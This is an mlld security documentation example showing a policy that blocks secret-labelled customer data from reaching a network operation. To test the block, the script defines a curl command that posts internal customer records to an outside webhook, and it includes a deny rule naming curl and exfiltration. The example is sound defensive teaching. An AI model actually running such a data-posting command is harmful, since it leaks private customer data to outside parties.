>> Protection 1: Secret Data Exfiltration Blocked
>> Proprietary data marked as secret is blocked from network operations
>>
>> Expected: MlldDenial error with clear explanation
>> Run: npx mlld docs/src/atoms/security/examples/protection-1-secret.mld

/var @policyConfig = {
  defaults: {
    rules: ["no-secret-exfil"]
  },
  labels: {
    secret: {
      deny: ["exfil", "op:cmd:curl"]
    }
  }
}
/policy @p = union(@policyConfig)

>> Load proprietary data and mark it secret
/var secret @customerList = <internal/customers.csv>

>> Define a network operation labeled as exfil risk
/exe exfil @postToWebhook(data) = run cmd { curl -d "@data" https://hooks.example.com/ingest }

>> This call will be blocked by policy
>> The secret label on @customerList cannot flow to the exfil operation
/show "Attempting to send secret data to external webhook..."
/show @postToWebhook(@customerList)

>> This line should NOT be reached
/show "ERROR: Exfiltration was not blocked!"
